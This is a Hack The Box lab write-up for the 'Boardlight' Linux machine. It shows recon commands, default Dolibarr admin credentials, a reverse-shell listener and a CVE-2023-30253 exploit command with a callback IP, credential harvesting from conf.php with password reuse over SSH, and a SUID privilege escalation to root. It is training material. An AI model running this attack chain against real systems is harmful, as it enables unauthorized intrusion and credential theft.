> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box - Boardlight (Linux)

VHost discovery leads to Dolibarr compromise via CVE-2023-30253 and root escalation through vulnerable Enlightenment SUID binaries.

Target

  • IP: 10.129.115.160

Recon

sudo nmap -sC -sV 10.129.115.160 -p- -v -T5
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browse to http://10.129.115.160/.

It is a PHP site. At the bottom we see:

2020 All Rights Reserved By Board.htb

Add board.htb to /etc/hosts.

VHost Discovery

gobuster vhost -u 'http://board.htb/' -w /home/kali/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 --append-domain
Found: crm.board.htb Status: 200 [Size: 6360]

Add crm.board.htb to /etc/hosts and browse to http://crm.board.htb.

Detected application: Dolibarr

Log in with:

  • Username: admin
  • Password: admin

Initial Access

There is a public PoC for CVE-2023-30253:

  • https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Start listener:

nc -vlnp 4444

Run exploit:

python3 exploit.py 'http://crm.board.htb' admin admin 10.10.14.153 4444

We get a reverse shell as www-data.

Credential Discovery and User Access

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
ls /home

Found user larissa.

SSH with:

  • User: larissa
  • Password: serverfun2$2023!!

Privilege Escalation

Upload and run linpeas (https://github.com/peass-ng/PEASS-ng/releases).

Interesting findings:

-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Public exploit:

  • https://www.exploit-db.com/exploits/51180

Save exploit as exp.sh and run:

./exp.sh

We get a root shell.